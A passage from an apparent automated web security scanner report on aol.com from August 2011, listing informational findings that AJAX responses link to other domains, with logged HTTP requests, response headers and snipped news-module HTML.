name="om_localweather4" class="lnid-sec4_lnk4">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
</a>

| <a href="http://mapq.st/?q=75201&maptype=map&layer=traffic" name="om_localtraffic1" class="lnid-sec5_lnk5">Live Traffic Updates</a>
...[SNIP]...
<div id="localPatchStory">

<a id="localPatchLogo" title="Your local source for news, events, business listings, and discussion." name="om_patchicon" target="_blank" href="http://www.patch.com/"></a><h3 id="patchHeader"><a name="om_patchheader" target="_blank" href="http://www.patch.com/">Today's Neighborhood Pick</a>
...[SNIP]...
<p><a id="patchLoc" name="om_patchlocation" href="http://bed-stuy.patch.com/">Bedford-Stuyvesant, NY:</a> &nbsp;<a name="om_patchstory" target="_blank" href="http://bed-stuy.patch.com/articles/cast-iron-gates-and-chicken-wire-surround-her-house-to-avoid-eviction">Elderly Woman Resorts to Iron Gates, Chicken Wire to Stave Off Eviction</a>
...[SNIP]...

6.15. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=15&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl15

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-95.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2475
Set-Cookie: JSESSIONID=93BB77764F8FBAE0E5369C9BAB541BCB; Path=/aol
Content-Length: 2475

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl15 plid-87510 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl15_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl15|sec1_lnk1|87510" href="http://www.huffingtonpost.com/2011/08/18/child-well-being-rankings_n_929724.html"><img height="217" alt="Minneapolis" width="386" src="http://i.huffpost.com/gen/332356/thumbs/a-MINNESOTA-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl15_hdln" href="http://www.huffingtonpost.com/2011/08/18/child-well-being-rankings_n_929724.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl15|sec1_lnk2|87510">The Best (& Worst) States for Children</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl15_cpy" href="http://www.huffingtonpost.com/2011/08/18/child-well-being-rankings_n_929724.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl15|sec1_lnk3|87510">Southern state that was ranked last</a>
...[SNIP]...
<li ><a name="om_dl15_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl15|sec3_lnk1|87510" href="http://www.huffingtonpost.com/katherine-bindley/interviewing-should-you-take-the-ring-off_b_930242.html">Reason Women Don't Get Raises?</a>
...[SNIP]...
<li ><a name="om_dl15_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl15|sec3_lnk2|87510" href="http://www.huffingtonpost.com/2011/08/18/macys-giambattista-valli-collaboration-_n_930123.html">Macy's Names Its Next Designer</a>
...[SNIP]...
<li ><a name="om_dl15_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl15|sec3_lnk3|87510" href="http://www.huffingtonpost.com/carleton-kendrick/are-you-embarrassed-by-yo_b_929119.html">Embarrassed by Your Kids' Looks?</a>
...[SNIP]...

6.16. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=18&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl18

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-70.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2572
Set-Cookie: JSESSIONID=0B171AAA7FE5F942446C3D16AD9463A0; Path=/aol
Content-Length: 2572

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl18 plid-87445 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl18_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl18|sec1_lnk1|87445" href="http://www.huffingtonpost.com/2011/08/17/kim-kardashian-wedding-guest-list_n_929908.html#s332559&amp;title=Lala_Vasquez_"><img height="217" alt="Kris and Kim Kissing" width="386" src="http://i.huffpost.com/gen/332235/thumbs/a-KIM-AND-KRIS-KISS-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl18_hdln" href="http://www.huffingtonpost.com/2011/08/17/kim-kardashian-wedding-guest-list_n_929908.html#s332559&amp;title=Lala_Vasquez_" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl18|sec1_lnk2|87445">Star-Studded Guest List Revealed


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl18_cpy" href="http://www.huffingtonpost.com/2011/08/17/kim-kardashian-wedding-guest-list_n_929908.html#s332559&amp;title=Lala_Vasquez_" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl18|sec1_lnk3|87445">15 celebs who said 'I do' to the invite
</a>
...[SNIP]...
<li ><a name="om_dl18_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl18|sec3_lnk1|87445" href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html">Anderson Cooper Loses Composure
</a>
...[SNIP]...
<li ><a name="om_dl18_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl18|sec3_lnk2|87445" href="http://www.huffingtonpost.com/2011/07/29/analeigh-tiptons-star-rises_n_912944.html">New 'It' Girl Is 22-Year-Old Beauty
</a>
...[SNIP]...
<li ><a name="om_dl18_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl18|sec3_lnk3|87445" href="http://www.aoltv.com/2011/08/18/real-housewives-suicide/">Ex-'Housewife' Considered Suicide
</a>
...[SNIP]...

6.17. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=21&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl21

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-38.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2449
Set-Cookie: JSESSIONID=B5FF9B64B3C9B143D4789D34203998B9; Path=/aol
Content-Length: 2449

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl21 plid-87439 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl21_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl21|sec1_lnk1|87439" href="http://www.huffingtonpost.com/2011/08/17/viola-drath-death_n_929935.html"><img height="217" alt="Viola Drath" width="386" src="http://portal.aolcdn.com/p5/forms/620/aa914711-50a3-4a73-a165-5be005d1162a.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl21_hdln" href="http://www.huffingtonpost.com/2011/08/17/viola-drath-death_n_929935.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl21|sec1_lnk2|87439">Socialite's Bizarre Death a Mystery</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl21_cpy" href="http://www.huffingtonpost.com/2011/08/17/viola-drath-death_n_929935.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl21|sec1_lnk3|87439">His astonishing reaction to her death</a>
...[SNIP]...
<li ><a name="om_dl21_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl21|sec3_lnk1|87439" href="http://www.huffingtonpost.com/2011/08/18/f-word-pg-13-movies_n_930165.html">F-Word Down in PG-13 Movies</a>
...[SNIP]...
<li ><a name="om_dl21_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl21|sec3_lnk2|87439" href="http://www.foxnews.com/us/2011/08/17/new-video-surfaces-showing-unprovoked-attack-by-philadelphia-teens/">Video Shows Brutal Mob Attack</a>
...[SNIP]...
<li ><a name="om_dl21_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl21|sec3_lnk3|87439" href="http://www.foxnews.com/us/2011/08/17/tennessee-doctor-told-to-remove-american-flag-flying-at-office/">Woman Told to Remove American Flag</a>
...[SNIP]...

6.18. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-85.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2463
Set-Cookie: JSESSIONID=F2F3171F94E1B6C201CDAF053AB96366; Path=/aol
Content-Length: 2463

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-87573 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|87573" href="http://www.huffingtonpost.com/2011/08/18/michael-sanchez-reunited-_n_930293.html"><img height="217" alt="Michael Sanchez and Emily" width="386" src="http://i.huffpost.com/gen/332679/thumbs/a-MICHAEL-SANCHEZ-AND-DAUGHTER-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" href="http://www.huffingtonpost.com/2011/08/18/michael-sanchez-reunited-_n_930293.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|87573">Dad and Daughter Reunite After 3 Years
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://www.huffingtonpost.com/2011/08/18/michael-sanchez-reunited-_n_930293.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|87573">How he eventually tracked her down</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|87573" href="http://www.huffingtonpost.com/2011/08/18/james-desborough-arrested_n_930233.html">Hollywood Arrest in Hacking Scandal
</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|87573" href="http://www.huffingtonpost.com/2011/08/18/dandre-howard-triple-murd_n_930612.html">Triple-Murder Suspect Claims Self Defense
</a>
...[SNIP]...

6.19. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html, */*; q=0.01
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/?r=404
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: rrpmo1=rr1~1~1313709994071~0; stips5=1; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313710009932-New%7C1376782009932%3B%20s_nrgvo%3DNew%7C1376782009933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 23:26:36 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-92.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=E26F571FE499A1AE7150504D4050F172; Path=/aol
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 12159

<div id="local-module" class="gmod mnid-local plid-87491">
<div id="localheader">

<h2>Local News and Weather</h2>

<div id="localstories_location" class="localeditspace">
<div class="citySta
...[SNIP]...
<a href="" name="om_localclose" id="locationclose" class="lnid-sec1_lnk4 sprite"><img src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="Cancel"></a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk1 tooltips" name="om_local_1" href="http://dfw.cbslocal.com/2011/08/18/report-finds-nearly-one-in-four-texas-children-living-in-poverty/" target='_blank' >Report Finds Nearly One in Four Texas...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk2 tooltips" name="om_local_2" href="http://www.nbcdfw.com/news/local/Hunt-Co-Brush-Fire-Burning-Several-Acres-128037173.html" target='_blank' >Brushfires Break Out in Johnson, Hunt...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk3 tooltips" name="om_local_3" href="http://www.nbcdfw.com/news/local/DISD-Still-Needs-285-Teachers-128035953.html" target='_blank' >DISD Still Needs 285 Teachers</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk4 tooltips" name="om_local_4" href="http://www.star-telegram.com/2011/08/18/3299583/local-catholic-churches-warned.html" target='_blank' >Local Catholic churches warned of threats...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk5 tooltips" name="om_local_5" href="http://dfw.cbslocal.com/2011/08/18/dow-jones-drops-400-points/" target='_blank' >Dow Jones Drops 400+ Points</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk6 tooltips" name="om_local_6" href="http://www.myfoxdfw.com/dpps/news/more-than-2,000-civilians-killed-in-syria-dpgonc-km-20110818_14625917" target='_blank' >More Than 2,000 Civilians Dead In Syria</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk7 tooltips" name="om_local_7" href="http://dfw.cbslocal.com/2011/08/18/good-samaritan-fights-current-to-save-drowning-boy/" target='_blank' >Good Samaritan Fights Current To Save...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk8 tooltips" name="om_local_8" href="http://www.cbssports.com/nfl/story/15450124/mcmahon-former-players-sue-nfl-over-concussions/rss" target='_blank' >McMahon, former players sue NFL over...</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather1" class="lnid-sec4_lnk1">
<img alt="Mostly Clear"
title="Mostly Clear"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather2" class="lnid-sec4_lnk2">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather3" class="lnid-sec4_lnk3">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather4" class="lnid-sec4_lnk4">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
</a>

| <a href="http://mapq.st/?q=75201&maptype=map&layer=traffic" name="om_localtraffic1" class="lnid-sec5_lnk5">Live Traffic Updates</a>
...[SNIP]...
<div id="localPatchStory">

<a id="localPatchLogo" title="Your local source for news, events, business listings, and discussion." name="om_patchicon" target="_blank" href="http://www.patch.com/"></a><h3 id="patchHeader"><a name="om_patchheader" target="_blank" href="http://www.patch.com/">Today's Neighborhood Pick</a>
...[SNIP]...
<p><a id="patchLoc" name="om_patchlocation" href="http://bed-stuy.patch.com/">Bedford-Stuyvesant, NY:</a> &nbsp;<a name="om_patchstory" target="_blank" href="http://bed-stuy.patch.com/articles/cast-iron-gates-and-chicken-wire-surround-her-house-to-avoid-eviction">Elderly Woman Resorts to Iron Gates, Chicken Wire to Stave Off Eviction</a>
...[SNIP]...

6.20. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2520
Set-Cookie: JSESSIONID=A3952DF32658E1DB2F8B42FB462C9CBB; Path=/aol
Content-Length: 2520

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-87592 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl3_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl3|sec1_lnk1|87592" href="http://energy.aol.com/2011/08/13/completely-off-the-grid/"><img height="217" alt="Mike Strizki's solar panels generate enough power for him to live off the grid year-round at his house in Hopewell, N.J." width="386" src="http://i.huffpost.com/gen/332739/thumbs/a-HYRDOGENHOUSE-386x217.jpg"/></a>
...[SNIP]...

6.21. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl9

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-51.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2000
Set-Cookie: JSESSIONID=7C1572C72EA5E38BAA9DD224BBEC41C5; Path=/aol
Content-Length: 2000

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl9 plid-87411 display-lightbox">
<div id="advert">

...[SNIP]...
</span><img height="217" alt="System Mechanic" width="386" src="http://i.huffpost.com/gen/332196/thumbs/a-SYSTEM-MECHANIC-386x217.jpg"/></a>
...[SNIP]...
<a id="dl-sponsorimg" href="http://lifestore.aol.com/main" class="icid-maing-grid7|main5|dl9|link4|87411"><img src="http://portal.aolcdn.com/p5/forms/673/85a240c0-468a-4d46-b2d8-5587dc87339c.gif"/></a>
...[SNIP]...

6.22. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-52.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2541
Set-Cookie: JSESSIONID=0E9A2D9FF49F6A3CFF3BA67A357AE190; Path=/aol
Content-Length: 2541

<span class="dn" id="#curr-dlcount">25</span>
